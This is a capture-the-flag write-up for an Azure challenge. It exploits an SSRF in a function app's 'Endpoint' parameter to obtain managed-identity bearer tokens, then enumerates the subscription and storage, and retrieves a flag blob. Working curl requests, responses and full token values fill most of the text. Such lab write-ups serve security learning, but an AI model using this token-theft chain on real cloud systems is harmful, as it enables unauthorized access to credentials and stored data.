Flag 7

The Deployer App error message suggested that we must include a query string parameter of Endpoint.

Using Postman, I made it visit to a requestbin endpoint, but was greeted with a new error message

{"statusCode":500,"message":"An unexpected error occured while fetching the AAD Token.","correlationId":"d64206c2-b852-4bbd-9938-672ee908b3d6"}

It shows an error fetching an AAD Token, which reminds me of a Cloud SSRF Attack.

Cloud SSRF - HackTricksbook.hacktricks.xyz

Referring to HackTricks, I made the Endpoint=https://management.azure.com and I am able to retrieve a bearer token.

Request

curl --location 'https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw%3D%3D&Endpoint=https%3A%2F%2Fmanagement.azure.com'

Response

{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzE2MiwibmJmIjoxNjc5ODM3MTYyLCJleHAiOjE2Nzk5MjM4NjIsImFpbyI6IkUyWmdZUGhxcEhreXVzRDh2VXZGZ3A4RnN6M3pBQT09IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwiaWR0eXAiOiJhcHAiLCJvaWQiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJyaCI6IjAuQVh3QWczSklYNDY0M2txQU5YdktyRUZXczBaSWYza0F1dGRQdWtQYXdmajJNQk83QUFBLiIsInN1YiI6IjVkMDRjYzRhLWM2N2QtNDZmOC1hNDU2LTJjZDMxNTc0N2JiYSIsInRpZCI6IjVmNDg3MjgzLWI4OGUtNGFkZS04MDM1LTdiY2FhYzQxNTZiMyIsInV0aSI6Imp2WVlhdFJ2QjAtXzUyNzQ0QUtWQUEiLCJ2ZXIiOiIxLjAiLCJ4bXNfbWlyaWQiOiIvc3Vic2NyaXB0aW9ucy83YjliZDkxNi04YmQyLTQ0NDYtOTY3OC04NTMxZWY2NjNlZGIvcmVzb3VyY2Vncm91cHMvREFSVE1pc3Npb24vcHJvdmlkZXJzL01pY3Jvc29mdC5XZWIvc2l0ZXMvUk9TQXJyYXkiLCJ4bXNfdGNkdCI6MTY3ODg3NTYxMn0.L3CVBYSqNH1TO4YweUhNDnxFkF3K_mXcS1NEmQkMlPH1CKoy0mKY83bgg9G4ajZvts4hckI8KUU9mT3Fs-i8lPtlismbgkJdW_ZBgFexAA_0FRtJTXWerwe4x69Zr6Yw8FNNPii0YK-h1intntm-D96XSOri21DrCztoyLOaxTPMTt0jk-Oy491ohIYI36j6A2d_EQOXygrLc-7AzjM6ooAftsYqzLhUjKq3xAG1OAo5bT_ewYqmZKH8ZXTzsn27zwdbpfv86BrVevb6vZ5FlDuF9DG5jI-Iu1OO_U9SnKb3riprZTbq4EDXD_AWnXFli_WBsWWtYpa_FF24hgcK1w","expires_on":"03/27/2023 13:31:01 +00:00","resource":"https://management.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}

Referring to Azure Documentation and this github url, I used Postman to perform further enumeration of the permission.

Resources - List - REST API (Azure Resource Management)MicrosoftLearn

I first retrieved the subscription ID by requesting https://management.azure.com/subscriptions?api-version=2020-01-01

Request

curl --location 'https://management.azure.com/subscriptions?api-version=2020-01-01' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

{
    "value": [
        {
            "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb",
            "authorizationSource": "RoleBased",
            "managedByTenants": [],
            "subscriptionId": "7b9bd916-8bd2-4446-9678-8531ef663edb",
            "tenantId": "5f487283-b88e-4ade-8035-7bcaac4156b3",
            "displayName": "dartsub",
            "state": "Enabled",
            "subscriptionPolicies": {
                "locationPlacementId": "Public_2014-09-01",
                "quotaId": "PayAsYouGo_2014-09-01",
                "spendingLimit": "Off"
            }
        }
    ],
    "count": {
        "type": "Total",
        "value": 1
    }
}

Then I attempt to retrieve a list of resources that the current user has access to.

Request

curl --location 'https://management.azure.com/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resources?api-version=2019-10-01' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

{
    "value": [
        {
            "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resourceGroups/DARTMission/providers/Microsoft.Storage/storageAccounts/coresat",
            "name": "coresat",
            "type": "Microsoft.Storage/storageAccounts",
            "sku": {
                "name": "Standard_LRS",
                "tier": "Standard"
            },
            "kind": "StorageV2",
            "location": "eastus",
            "tags": {}
        }
    ]
}

I identify that the user has access to a storage account named coresat. To perform further enumeration on the storage account, I will need to request a storage account bearer token. Keeping in mind that the current bearer token is for management.

Request

curl --location https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw==&Endpoint=https://storage.azure.com

Response

{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL3N0b3JhZ2UuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzMzNSwibmJmIjoxNjc5ODM3MzM1LCJleHAiOjE2Nzk5MjQwMzUsImFpbyI6IkUyWmdZSGdjUHBzLzRmaWxTd0t5Q1ZzK1Q3Z2ZDd0E9IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwib2lkIjoiNWQwNGNjNGEtYzY3ZC00NmY4LWE0NTYtMmNkMzE1NzQ3YmJhIiwicmgiOiIwLkFYd0FnM0pJWDQ2NDNrcUFOWHZLckVGV3M0R21CdVRVODZoQ2tMYkNzQ2xKZXZHN0FBQS4iLCJzdWIiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJ0aWQiOiI1ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMiLCJ1dGkiOiJWNUNYeHhBMWFVS1huZ1VSdG1na0FRIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvN2I5YmQ5MTYtOGJkMi00NDQ2LTk2NzgtODUzMWVmNjYzZWRiL3Jlc291cmNlZ3JvdXBzL0RBUlRNaXNzaW9uL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL1JPU0FycmF5In0.KDEdC4IihcUOMWIpdgg1kZy3DtJirpirE1yL91Hc90YebkP_6tUcq-2zzSqo470AFyuAeht5hTsYgGClQj8xJPsAZckZG8SUWPBSCSoBXeP-29stnEhSkM6XOUf_wbPEtxM7IDgGaK9MboufCm5y4_un1_dg3BCqqacaQLBtBUoTiPG5Nfu1uBnK_Duy8g_e2XDLOSjaBUZIB4T1-mVlN6PnQciTHmhKGJdz1Mf-dL7yz8YCg0Yfzr7Iao6wel5XuIceT9TU7jQrgsXAKYkHU_zF5ETJG45IGm4KV_xCQCZg-SGfSbu1SGwqIJtS5rj6pplmwfqRZvC_eGwo3pENAA","expires_on":"03/27/2023 13:33:55 +00:00","resource":"https://storage.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}

Next I refer to this documentation to further enumerate the storage account.

Azure Storage REST API ReferenceMicrosoftLearn

Request

curl --location 'https://coresat.blob.core.windows.net/?comp=list' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://coresat.blob.core.windows.net/">
    <Containers>
        <Container>
            <Name>datahandling</Name>
            <Properties>
                <Last-Modified>Wed, 15 Mar 2023 14:38:57 GMT</Last-Modified>
                <Etag>"0x8DB256302872266"</Etag>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <HasImmutabilityPolicy>false</HasImmutabilityPolicy>
                <HasLegalHold>false</HasLegalHold>
            </Properties>
        </Container>
    </Containers>
    <NextMarker />
</EnumerationResults>

Now that we have the container name datahandling, we can enumerate the blobs within the container, referring to this article.

List Blobs (REST API) - Azure StorageMicrosoftLearn

Request

curl --location 'https://coresat.blob.core.windows.net/datahandling?restype=container&comp=list' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://coresat.blob.core.windows.net/" ContainerName="datahandling">
    <Blobs>
        <Blob>
            <Name>Flag7.txt</Name>
            <Properties>
                <Creation-Time>Fri, 17 Mar 2023 09:51:14 GMT</Creation-Time>
                <Last-Modified>Fri, 17 Mar 2023 09:51:14 GMT</Last-Modified>
                <Etag>0x8DB26CD25E0F3A3</Etag>
                <Content-Length>47</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>d1UOmf3KFXonNzNJvZB+5Q==</Content-MD5>
                <Cache-Control />
                <Content-Disposition />
                <BlobType>BlockBlob</BlobType>
                <AccessTier>Hot</AccessTier>
                <AccessTierInferred>true</AccessTierInferred>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <ServerEncrypted>true</ServerEncrypted>
            </Properties>
        </Blob>
        <Blob>
            <Name>LORRI-Cert.txt</Name>
            <Properties>
                <Creation-Time>Wed, 15 Mar 2023 14:39:51 GMT</Creation-Time>
                <Last-Modified>Wed, 15 Mar 2023 14:39:51 GMT</Last-Modified>
                <Etag>0x8DB256322B11B97</Etag>
                <Content-Length>6998</Content-Length>
                <Content-Type>application/octet-stream</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>19wxEVC9dZDYVVICu9JmtQ==</Content-MD5>
                <Cache-Control />
                <Content-Disposition />
                <BlobType>BlockBlob</BlobType>
                <AccessTier>Hot</AccessTier>
                <AccessTierInferred>true</AccessTierInferred>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <ServerEncrypted>true</ServerEncrypted>
            </Properties>
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>

There are 2 blob in the container, namely Flag7.txt and LORRI-Cert.txt

Retrieving the Flag7.txt gives me the flag.

Request

curl --location 'https://coresat.blob.core.windows.net/datahandling/Flag7.txt' \
--header 'Authorization: Bearer ${token}' \
--header 'x-ms-version: 2017-11-09'

Response

Flag 7 : All systems are functioning normally.

Flag 7 : All systems are functioning normally.